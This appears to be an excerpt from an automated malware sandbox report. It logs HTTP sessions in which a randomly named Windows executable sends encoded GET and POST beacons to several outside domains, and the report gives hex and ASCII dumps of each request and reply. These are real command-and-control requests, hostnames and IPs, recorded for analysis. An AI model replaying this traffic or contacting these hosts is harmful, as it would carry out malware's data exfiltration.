                                                                                                                                Data Raw: 65 64 44 3d 4e 46 45 7a 31 54 59 4d 31 39 36 56 69 32 45 34 45 6a 57 4c 49 4a 76 55 32 38 75 4f 42 41 53 37 6f 38 69 51 6d 4c 7a 61 52 63 57 59 34 35 47 54 6b 69 43 35 69 77 46 6a 43 63 4f 4d 6d 6c 71 45 63 34 46 69 4b 39 48 4e 74 65 43 7a 6e 4d 5a 6d 76 73 69 4d 77 35 45 5a 47 67 36 77 74 79 56 79 4a 59 78 79 72 64 37 31 36 5a 43 4b 4c 4e 79 46 77 37 79 56 67 75 74 63 33 76 64 7a 30 74 75 79 74 36 6f 65 4d 6f 49 6b 46 4a 50 63 71 2f 48 37 74 74 77 37 46 42 49 32 66 71 70 75 74 35 68 51 39 62 65 57 65 79 33 49 55 5a 54 69 6e 45 52 35 42 68 77 46 7a 4a 77 71 7a 33 6b 30 30 48 6b 34 53 69 6c 71 6e 54 77 66 4e 2b 48 45 4b 52 39 50 48 61 33 6e 37 55 78 7a 49 38 39 6a 63 46 50 56 53 70 49 65 6c 59 57 62 78 2f 39 53 73 48 4d 46 36 6f 7a 33 2b 68 67 71 48 71 62 76 4f 52 69 44 2b 47 71 50 46 4f 61 78 4c 4b 56 37 57 6d 57 4a 2b 61 6a 6a 47 2f 6c 74 37 57 52 6c 34 36 4d 72 6e 48 37 6e 55 68 59 47 76 4c 39 59 4c 31 39 42 4a 68 48 4b 49 71 64 78 57 43 2f 31 6c 2f 74 68 72 79 75 35 45 72 2f 31 78 2b 35 63 4d 7a [TRUNCATED]
                                                                                                                                Data Ascii: edD=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 [TRUNCATED]


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                8 | 192.168.2.8 | 49716 | 3.33.130.190 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:45.692089081 CET | 434 | OUT | GET /b8ns/?edD=AHsT2lQM7afkvhgrd3a+ObbJ1OaVFxW6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0tAUFBubyxcqdahqlM3D7pXLIOqGlrWJuLpzoNBd4O/a7Q==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.loginov.enterprises
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:54:46.330796957 CET | 412 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Tue, 29 Oct 2024 15:54:46 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 272
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 64 44 3d 41 48 73 54 32 6c 51 4d 37 61 66 6b 76 68 67 72 64 33 61 2b 4f 62 62 4a 31 4f 61 56 46 78 57 36 71 50 43 35 36 76 79 4c 59 2b 72 2f 68 62 71 4f 67 7a 61 6e 30 78 74 43 4e 38 4f 4c 34 42 6a 2f 50 75 73 7a 58 4a 48 76 6a 76 71 78 69 75 49 50 74 73 57 76 30 74 41 55 46 42 75 62 79 78 63 71 64 61 68 71 6c 4d 33 44 37 70 58 4c 49 4f 71 47 6c 72 57 4a 75 4c 70 7a 6f 4e 42 64 34 4f 2f 61 37 51 3d 3d 26 6d 52 52 3d 56 78 75 64 66 30 66 48 7a 4c 77 38 34 6e 33 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?edD=AHsT2lQM7afkvhgrd3a+ObbJ1OaVFxW6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0tAUFBubyxcqdahqlM3D7pXLIOqGlrWJuLpzoNBd4O/a7Q==&mRR=Vxudf0fHzLw84n3P"}</script></head></html>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                9 | 192.168.2.8 | 49717 | 103.71.154.12 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:51.717940092 CET | 675 | OUT | POST /1t94/ HTTP/1.1
                                                                                                                                Host: www.2925588.com
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2925588.com
                                                                                                                                Referer: http://www.2925588.com/1t94/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 74 68 6b 6f 4b 41 33 6c 53 35 39 56 71 59 61 65 44 4e 44 6b 47 34 34 51 65 6f 42 38 62 57 50 30 7a 47 55 75 6f 33 6c 67 4e 39 4f 57 41 41 48 79 78 70 35 36 53 32 4f 43 65 63 6d 36 41 78 4e 4b 51 55 72 62 65 7a 43 6f 6f 6c 44 4d 44 33 61 43 6d 47 56 6a 35 73 39 68 53 77 4a 32 32 2f 2b 31 78 36 33 4d 5a 41 57 5a 64 4e 52 43 5a 70 31 42 35 6d 6c 42 56 56 33 46 79 30 34 73 54 69 6c 6b 38 35 7a 36 37 50 71 6d 49 66 38 70 4b 47 65 41 75 48 6f 75 4c 49 31 63 34 52 6d 59 35 6c 53 53 6c 4c 6f 45 68 34 30 6c 56 6c 41 51 42 52 38 42 65 4c 6e 72 55 77 47 6b 71 31 75 45 51 5a 36 75 47 6f 30 7a 43 37 55 3d
                                                                                                                                Data Ascii: edD=thkoKA3lS59VqYaeDNDkG44QeoB8bWP0zGUuo3lgN9OWAAHyxp56S2OCecm6AxNKQUrbezCoolDMD3aCmGVj5s9hSwJ22/+1x63MZAWZdNRCZp1B5mlBVV3Fy04sTilk85z67PqmIf8pKGeAuHouLI1c4RmY5lSSlLoEh40lVlAQBR8BeLnrUwGkq1uEQZ6uGo0zC7U=
                                                                                                                                Oct 29, 2024 16:54:52.674695015 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:54:52 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                10 | 192.168.2.8 | 49718 | 103.71.154.12 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:54.660399914 CET | 695 | OUT | POST /1t94/ HTTP/1.1
                                                                                                                                Host: www.2925588.com
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2925588.com
                                                                                                                                Referer: http://www.2925588.com/1t94/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 74 68 6b 6f 4b 41 33 6c 53 35 39 56 6f 34 4b 65 42 71 58 6b 52 49 34 58 62 6f 42 38 56 32 50 77 7a 47 51 75 6f 32 68 4f 4b 50 61 57 44 67 33 79 6a 63 4e 36 58 32 4f 43 57 38 6d 37 4e 52 4e 44 51 55 58 54 65 7a 75 6f 6f 6c 6e 4d 44 32 71 43 6d 78 68 69 36 63 39 6e 48 67 4a 77 34 66 2b 31 78 36 33 4d 5a 41 43 7a 64 4e 4a 43 5a 59 46 42 34 48 6c 43 62 31 33 47 6c 45 34 73 58 69 6b 6a 38 35 7a 45 37 4c 4b 41 49 64 30 70 4b 46 4b 41 67 7a 38 68 46 49 30 32 6c 68 6d 54 36 67 50 64 6a 70 73 5a 76 6f 41 61 54 6a 51 57 45 6e 4e 72 45 70 76 74 58 77 75 50 71 32 47 79 56 75 6e 47 63 4c 6b 44 63 73 44 42 6c 4e 6f 2b 31 31 6c 69 4b 58 79 76 4f 43 42 30 53 6f 5a 30
                                                                                                                                Data Ascii: edD=thkoKA3lS59Vo4KeBqXkRI4XboB8V2PwzGQuo2hOKPaWDg3yjcN6X2OCW8m7NRNDQUXTezuoolnMD2qCmxhi6c9nHgJw4f+1x63MZACzdNJCZYFB4HlCb13GlE4sXikj85zE7LKAId0pKFKAgz8hFI02lhmT6gPdjpsZvoAaTjQWEnNrEpvtXwuPq2GyVunGcLkDcsDBlNo+11liKXyvOCB0SoZ0
Oct 29, 2024 16:54:55.661431074 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:54:55 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49719 | 103.71.154.128 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:54:57.199455023 CET | 1712 | OUT | POST /1t94/ HTTP/1.1
                                                                                                                                Host: www.2925588.com
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2925588.com
                                                                                                                                Referer: http://www.2925588.com/1t94/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 74 68 6b 6f 4b 41 33 6c 53 35 39 56 6f 34 4b 65 42 71 58 6b 52 49 34 58 62 6f 42 38 56 32 50 77 7a 47 51 75 6f 32 68 4f 4b 50 69 57 41 52 58 79 79 4c 52 36 51 32 4f 43 59 63 6d 6d 4e 52 4d 54 51 55 50 58 65 7a 79 34 6f 6e 50 4d 53 68 43 43 67 41 68 69 68 4d 39 6e 59 51 4a 31 32 2f 2b 61 78 36 6e 49 5a 41 53 7a 64 4e 4a 43 5a 62 4e 42 6f 6d 6c 43 5a 31 33 46 79 30 34 61 54 69 6c 45 38 35 37 79 37 4c 4f 50 49 4d 55 70 4c 6c 61 41 74 67 45 68 4a 49 30 30 6d 68 6e 54 36 67 4b 64 6a 70 42 67 76 71 67 77 54 6b 6b 57 46 6a 6f 52 52 59 75 78 42 47 6d 5a 69 33 4f 70 4e 70 72 78 57 59 67 46 65 37 79 6d 7a 5a 6f 2f 33 46 70 66 65 33 37 6e 54 32 31 68 53 63 30 33 31 35 2b 44 6c 51 41 70 62 58 7a 4d 6e 48 34 6b 2f 39 58 45 6c 39 54 4e 73 42 6d 43 72 61 30 43 63 74 49 71 41 78 44 74 4e 51 6c 58 6e 46 4a 48 4f 6e 55 75 6d 71 2f 6f 54 75 74 69 6d 6b 61 4e 46 6a 52 4b 7a 7a 67 43 35 62 71 4a 41 63 77 57 2f 4c 5a 43 34 75 75 35 6f 2f 41 76 68 45 55 44 66 4d 6b 6c 67 73 78 70 50 5a 44 54 55 41 4c 54 68 6f [TRUNCATED]
                                                                                                                                Data Ascii: edD=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 [TRUNCATED]
Oct 29, 2024 16:54:58.142385006 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:54:57 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49720 | 103.71.154.128 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:54:59.743482113 CET | 426 | OUT | GET /1t94/?edD=gjMIJwSCW/9UgfmDC9v9JuEAXY9+Tk/wxiwa2AwzMfTndCXl3IsTOH3xQbqTIzs3KmqJPz6XjFO/L3LQlwMgjZ5WYlhZ6IbItanfVRefUclVTIAe/3x+VFj+y2sVXiouoQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.2925588.com
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Oct 29, 2024 16:55:00.676203012 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:00 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49721 | 81.169.145.95 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:55:06.161556959 CET | 708 | OUT | POST /pq4g/ HTTP/1.1
                                                                                                                                Host: www.treatyourownhip.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.treatyourownhip.online
                                                                                                                                Referer: http://www.treatyourownhip.online/pq4g/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 79 7a 54 35 6f 73 76 43 4e 2f 43 6d 43 43 73 39 30 4a 6a 52 30 67 59 6b 62 2f 41 45 72 4c 67 76 55 61 46 61 33 43 6b 4b 53 4b 6e 56 6b 55 41 30 42 73 6a 61 52 45 78 68 2f 6e 4c 34 2b 70 47 6e 4a 4d 6f 38 31 72 6f 5a 64 39 65 4b 6c 39 68 77 44 4e 44 73 4d 73 6d 57 62 36 48 71 75 78 43 73 48 78 70 77 2f 45 37 58 49 79 41 5a 54 62 5a 65 4e 31 67 4c 2f 4c 36 53 64 2b 4c 48 76 6e 31 55 75 64 59 62 34 43 77 69 45 35 48 5a 71 71 30 2f 63 62 7a 49 58 6f 57 54 53 43 4e 46 6b 35 45 36 7a 66 74 4e 33 78 66 4e 46 55 7a 72 66 79 6a 50 33 72 5a 48 7a 34 63 62 66 36 35 55 64 34 59 46 73 33 67 42 42 6d 34 3d
                                                                                                                                Data Ascii: edD=yzT5osvCN/CmCCs90JjR0gYkb/AErLgvUaFa3CkKSKnVkUA0BsjaRExh/nL4+pGnJMo81roZd9eKl9hwDNDsMsmWb6HquxCsHxpw/E7XIyAZTbZeN1gL/L6Sd+LHvn1UudYb4CwiE5HZqq0/cbzIXoWTSCNFk5E6zftN3xfNFUzrfyjP3rZHz4cbf65Ud4YFs3gBBm4=
Oct 29, 2024 16:55:06.999253988 CET | 374 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:55:06 GMT
                                                                                                                                Server: Apache/2.4.62 (Unix)
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49722 | 81.169.145.95 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:55:08.701910973 CET | 728 | OUT | POST /pq4g/ HTTP/1.1
                                                                                                                                Host: www.treatyourownhip.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.treatyourownhip.online
                                                                                                                                Referer: http://www.treatyourownhip.online/pq4g/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 79 7a 54 35 6f 73 76 43 4e 2f 43 6d 45 52 30 39 32 75 50 52 67 77 59 6a 55 66 41 45 6c 72 67 72 55 61 5a 61 33 44 67 6b 54 2f 2f 56 6c 78 6b 30 41 75 4c 61 53 45 78 68 6e 58 4c 35 30 4a 47 6f 4a 4d 6b 30 31 72 6b 5a 64 39 4b 4b 6c 38 52 77 45 2b 37 6a 4f 38 6d 51 44 4b 48 6f 78 42 43 73 48 78 70 77 2f 45 76 74 49 79 6f 5a 54 71 4a 65 4e 51 4d 4d 38 4c 36 4e 59 2b 4c 48 39 58 31 51 75 64 59 44 34 44 73 49 45 37 76 5a 71 6f 73 2f 64 4b 7a 4a 43 59 57 52 57 43 4d 6b 6a 4a 77 33 38 4e 4a 70 33 77 76 30 4e 6b 2f 64 65 45 53 6c 74 4a 52 42 77 34 30 77 66 35 52 69 59 50 46 74 32 55 77 78 66 78 76 5a 5a 6e 52 33 77 53 54 58 70 77 35 6b 59 73 58 39 44 61 65 67
